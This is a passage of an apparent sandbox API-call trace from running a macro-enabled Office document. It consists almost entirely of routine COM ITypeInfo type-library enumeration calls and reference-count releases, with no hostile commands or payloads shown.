This=0x1d39d552b18, index=0xdb, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.183] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.183] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xdc, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.183] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.183] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xdd, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.183] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.183] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xde, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.183] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.183] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xdf, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.183] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.183] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe0, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.183] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.183] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe1, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.183] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.183] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe2, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.183] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.183] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe3, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.183] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.183] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe4, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.183] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.183] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe5, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.183] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.183] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe6, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.183] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.183] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe7, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.183] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.183] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe8, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.183] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.183] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe9, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.183] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.183] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xea, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.183] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.183] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xeb, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.183] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.183] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xec, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.183] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.183] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xed, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.184] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.184] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xee, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.184] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.184] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xef, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.184] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.184] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf0, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.184] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.184] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf1, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.184] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.184] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf2, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.184] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.184] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf3, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.184] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.184] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf4, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.184] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.184] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf5, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.184] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.184] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf6, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.184] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.184] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf7, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.184] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.184] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf8, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.184] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.184] IUnknown:QueryInterface (in: This=0x1d39d552a68, riid=0x7ffce0bca878*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33e4fb65e8 | out: ppvObject=0x33e4fb65e8*=0x1d39d552a68) returned 0x0 [0060.184] ITypeInfo2:GetCustData (in: This=0x1d39d552a68, GUID=0x7ffce0bd5de0*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x33e4fb65f8 | out: pVarVal=0x33e4fb65f8*(varType=0x0, wReserved1=0x0, wReserved2=0x1b9, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0060.184] IUnknown:Release (This=0x1d39d552a68) returned 0x2 [0060.184] ITypeInfo:RemoteGetDocumentation (in: This=0x1d39d552a68, memid=-1, refPtrFlags=0xe4fb65f0, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0060.184] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x33e4fb6500, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0060.185] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Document") returned 0x50d36a [0060.185] IUnknown:QueryInterface (in: This=0x1d39d552bc8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb65a0 | out: ppvObject=0x33e4fb65a0*=0x0) returned 0x80004002 [0060.185] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552bc8, ppTypeAttr=0x33e4fb65c8, pDummy=0x33e4fb65a0 | out: ppTypeAttr=0x33e4fb65c8, pDummy=0x33e4fb65a0*=0x0) returned 0x0 [0060.185] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552bc8) returned 0x0 [0060.185] IUnknown:Release (This=0x1d39d552b18) returned 0x1 [0060.185] IUnknown:Release (This=0x1d39d552bc8) returned 0x3 [0060.185] IUnknown:Release (This=0x1d39d552a68) returned 0x1 [0060.186] IUnknown:Release (This=0x1d39d552a68) returned 0x1 [0060.187] IUnknown:AddRef (This=0x1d39d552b18) returned 0x3 [0060.187] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552b18, ppTypeAttr=0x33e4fb6820, pDummy=0x0 | out: ppTypeAttr=0x33e4fb6820, pDummy=0x0) returned 0x0 [0060.187] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552b18) returned 0x0 [0060.187] ITypeInfo:GetRefTypeOfImplType (in: This=0x1d39d552b18, index=0x0, pRefType=0x33e4fb6818 | out: pRefType=0x33e4fb6818*=0x3) returned 0x0 [0060.187] ITypeInfo:GetRefTypeInfo (in: This=0x1d39d552b18, hreftype=0x3, ppTInfo=0x33e4fb6828 | out: ppTInfo=0x33e4fb6828*=0x1d39834a048) returned 0x0 [0060.187] IUnknown:Release (This=0x1d39d552b18) returned 0x2 [0060.188] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39834a048, ppTypeAttr=0x33e4fb6820, pDummy=0x33e4fb67f8 | out: ppTypeAttr=0x33e4fb6820, pDummy=0x33e4fb67f8*=0x5) returned 0x0 [0060.188] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39834a048) returned 0x0 [0060.188] ITypeInfo:GetRefTypeOfImplType (in: This=0x1d39834a048, index=0x0, pRefType=0x33e4fb6818 | out: pRefType=0x33e4fb6818*=0x182) returned 0x0 [0060.188] ITypeInfo:GetRefTypeInfo (in: This=0x1d39834a048, hreftype=0x182, ppTInfo=0x33e4fb6828 | out: ppTInfo=0x33e4fb6828*=0x1d39834a0a0) returned 0x0 [0060.188] IUnknown:Release (This=0x1d39834a048) returned 0x2 [0060.188] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39834a0a0, ppTypeAttr=0x33e4fb6820, pDummy=0x33e4fb6800 | out: ppTypeAttr=0x33e4fb6820, pDummy=0x33e4fb6800*=0xe4fb6830) returned 0x0 [0060.188] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39834a0a0) returned 0x0 [0060.188] IUnknown:Release (This=0x1d39834a0a0) returned 0x1 [0060.188] IUnknown:Release (This=0x1d39d552b18) returned 0x1 [0060.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0361d40718", cchWideChar=11, lpMultiByteStr=0x33e4fb6810, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0361d40718", lpUsedDefaultChar=0x0) returned 11 [0060.188] GetLocalTime (in: lpSystemTime=0x33e4fb68f8 | out: lpSystemTime=0x33e4fb68f8*(wYear=0x7e4, wMonth=0xc, wDayOfWeek=0x4, wDay=0x18, wHour=0x8, wMinute=0x24, wSecond=0x29, wMilliseconds=0x1e2)) [0060.188] _ultow_s (in: _Value=0x61d40719, _Buffer=0x1d39da0e994, _BufferCount=0x9, _Radix=16 | out: _Buffer="61d40719") returned 0x0 [0060.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0461d40719", cchWideChar=11, lpMultiByteStr=0x33e4fb6850, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0461d40719", lpUsedDefaultChar=0x0) returned 11 [0060.188] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552b18, ppTypeAttr=0x33e4fb68a8, pDummy=0x1d39d8e74c0 | out: ppTypeAttr=0x33e4fb68a8, pDummy=0x1d39d8e74c0*=0x7) returned 0x0 [0060.188] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552b18, ppTypeAttr=0x33e4fb6850, pDummy=0x6 | out: ppTypeAttr=0x33e4fb6850, pDummy=0x6) returned 0x0 [0060.188] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552b18) returned 0x0 [0060.188] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552b18) returned 0x0 [0060.188] IUnknown:Release (This=0x1d39d552b18) returned 0x1 [0060.188] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d83cf70, cb=0x100) returned 0x1d39d94ae90 [0060.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x33e4fb6690, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0060.188] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ThisDocument") returned 0x509e3c [0060.189] IUnknown:Release (This=0x1d39d552b18) returned 0x1 [0060.189] IUnknown:Release (This=0x1d39d552b18) returned 0x1 [0060.189] IUnknown:QueryInterface (in: This=0x1d39d552a68, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb6450 | out: ppvObject=0x33e4fb6450*=0x0) returned 0x80004002 [0060.189] IUnknown:QueryInterface (in: This=0x1d39d552a68, riid=0x7ffce0bca878*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33e4fb6398 | out: ppvObject=0x33e4fb6398*=0x1d39d552a68) returned 0x0 [0060.189] ITypeInfo2:GetCustData (in: This=0x1d39d552a68, GUID=0x7ffce0bd5de0*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x33e4fb63a8 | out: pVarVal=0x33e4fb63a8*(varType=0x0, wReserved1=0xe4fb, wReserved2=0x33, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0060.189] IUnknown:Release (This=0x1d39d552a68) returned 0x2 [0060.189] ITypeInfo:RemoteGetDocumentation (in: This=0x1d39d552a68, memid=-1, refPtrFlags=0xe4fb63a0, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x33e4fb63c0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x33e4fb63c0*="") returned 0x0 [0060.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x33e4fb62b0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0060.189] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Document") returned 0x50d36a [0060.189] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552b18, ppTypeAttr=0x33e4fb63a0, pDummy=0x0 | out: ppTypeAttr=0x33e4fb63a0, pDummy=0x0) returned 0x0 [0060.189] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552b18) returned 0x0 [0060.189] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x0, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.189] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.189] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.189] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.189] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.189] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.189] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.189] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.189] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.189] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.189] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.189] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.189] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.189] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.189] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.189] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.190] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.190] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.190] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.190] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.190] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.190] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.190] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.190] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.190] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.190] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.190] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.190] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.190] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.190] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.190] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.190] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.190] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x10, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.190] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.190] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x11, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.190] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.190] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x12, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.190] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.190] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x13, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.190] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.190] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x14, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.190] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.190] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x15, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.190] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.190] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x16, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.190] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.190] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x17, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.190] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.190] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x18, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.190] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.190] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x19, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.190] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.190] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1a, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.190] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.190] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1b, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.190] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.190] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1c, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.190] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.191] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1d, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.191] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.191] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1e, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.191] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.191] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1f, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.191] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.191] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x20, ppFuncDesc=0x33e4fb6378, 